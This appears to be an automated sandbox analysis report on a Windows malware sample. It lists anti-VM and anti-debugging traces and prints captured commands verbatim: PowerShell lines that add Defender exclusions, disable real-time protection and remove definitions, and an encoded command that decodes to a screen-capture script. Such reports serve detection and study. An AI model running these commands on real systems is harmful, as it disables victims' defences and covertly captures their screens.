Source: RuntimeBroker2.0.exe, 00000006.00000002.2015669562.000002227B791000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: s.exe, 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RcF33KCGtqeMuNK3lOt
Source: Build.exe, 0000000D.00000002.1791336805.0000000004F62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 87Bym0x4Fy.exe, 00000000.00000002.1719021432.0000000001BB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWject%SystemRoot%\system32\mswsock.dll
Source: s.exe, 00000015.00000002.1932745064.0000000005330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: based.exe, 00000011.00000003.2130901869.000002A15E176000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2130901869.000002A15E16D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	API call chain: ExitProcess graph end node	graph_13-26162
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Code function: 5_2_00007FF72B05C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00007FF72B05C44C

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B6A640 mov eax, dword ptr fs:[00000030h]	13_2_00B6A640
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_00577DEE mov eax, dword ptr fs:[00000030h]	21_2_00577DEE
Source: C:\ProgramData\svchost.exe	Code function: 29_2_00687DEE mov eax, dword ptr fs:[00000030h]	29_2_00687DEE

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Code function: 5_2_00007FF72B072790 GetProcessHeap,

5_2_00007FF72B072790

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\cscript.exe	Process token adjusted: Debug
Source: C:\Users\user\cscript.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B05C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF72B05C44C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B05BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF72B05BBC0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B069924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF72B069924
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B05C62C SetUnhandledExceptionFilter,	5_2_00007FF72B05C62C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B05C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF72B05C44C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B05BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF72B05BBC0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B069924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF72B069924
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B05C62C SetUnhandledExceptionFilter,	7_2_00007FF72B05C62C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FFE0C0C004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FFE0C0C004C
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B6215D SetUnhandledExceptionFilter,	13_2_00B6215D
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B612D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00B612D7
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B6647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00B6647F
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B61FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00B61FCA
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55DC67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00007FF6D55DC67C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55DBDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00007FF6D55DBDE0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55DC860 SetUnhandledExceptionFilter,	15_2_00007FF6D55DC860
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55EACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00007FF6D55EACD8
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 18_2_00007FFE0122004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_00007FFE0122004C
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0056F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0056F838
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0056F9D5 SetUnhandledExceptionFilter,	21_2_0056F9D5
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0056FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0056FBCA
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_00578EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00578EBD
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0067F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_0067F838
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0067F9D5 SetUnhandledExceptionFilter,	29_2_0067F9D5
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0067FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_0067FBCA
Source: C:\ProgramData\svchost.exe	Code function: 29_2_00688EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_00688EBD
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B27D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_0000023225B27D90
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B2D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_0000023225B2D2A4
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000016716C6D2A4
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000016716C67D90
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E891D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000245E891D2A4
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E8917D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000245E8917D90

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: Base64 decoded <#iij#>Add-Type -AssemblyName System.Windows.Forms;<#rrp#>[System.Windows.Forms.MessageBox]::Show('error: expected '';'' before ''return''','','OK','Error')<#hzy#>
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: Base64 decoded <#ddm#>Add-MpPreference <#uki#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#anb#> -Force <#yly#>
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: Base64 decoded <#iij#>Add-Type -AssemblyName System.Windows.Forms;<#rrp#>[System.Windows.Forms.MessageBox]::Show('error: expected '';'' before ''return''','','OK','Error')<#hzy#>	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: Base64 decoded <#ddm#>Add-MpPreference <#uki#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#anb#> -Force <#yly#>	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\cscript.exe	NtEnumerateKey: Indirect: 0x2AD2842
Source: C:\Users\user\cscript.exe	NtEnumerateKey: Indirect: 0x2AD2875
Source: C:\Users\user\cscript.exe	NtEnumerateValueKey: Indirect: 0x123293D
Source: C:\Users\user\cscript.exe	NtDeviceIoControlFile: Indirect: 0x1232B9D
Source: C:\Users\user\cscript.exe	NtEnumerateValueKey: Indirect: 0x123290E
Source: C:\Users\user\cscript.exe	NtDeviceIoControlFile: Indirect: 0x2AD2B9D
Source: C:\Users\user\cscript.exe	NtEnumerateValueKey: Indirect: 0x2AD290E
Source: C:\Users\user\cscript.exe	NtResumeThread: Indirect: 0x2AD231E
Source: C:\Users\user\cscript.exe	NtEnumerateValueKey: Indirect: 0x2AD293D
Source: C:\Users\user\cscript.exe	NtQuerySystemInformation: Indirect: 0x123205D
Source: C:\ProgramData\setup.exe	NtQuerySystemInformation: Direct from: 0x7FF7994742AE
Source: C:\Users\user\cscript.exe	NtQuerySystemInformation: Indirect: 0x2AD205D
Source: C:\Users\user\cscript.exe	NtEnumerateKey: Indirect: 0x1232842
Source: C:\Users\user\cscript.exe	NtEnumerateKey: Indirect: 0x1232875

Maps a DLL or memory area into another process

Source: C:\ProgramData\setup.exe

Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly

Modifies Windows Defender protection settings

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
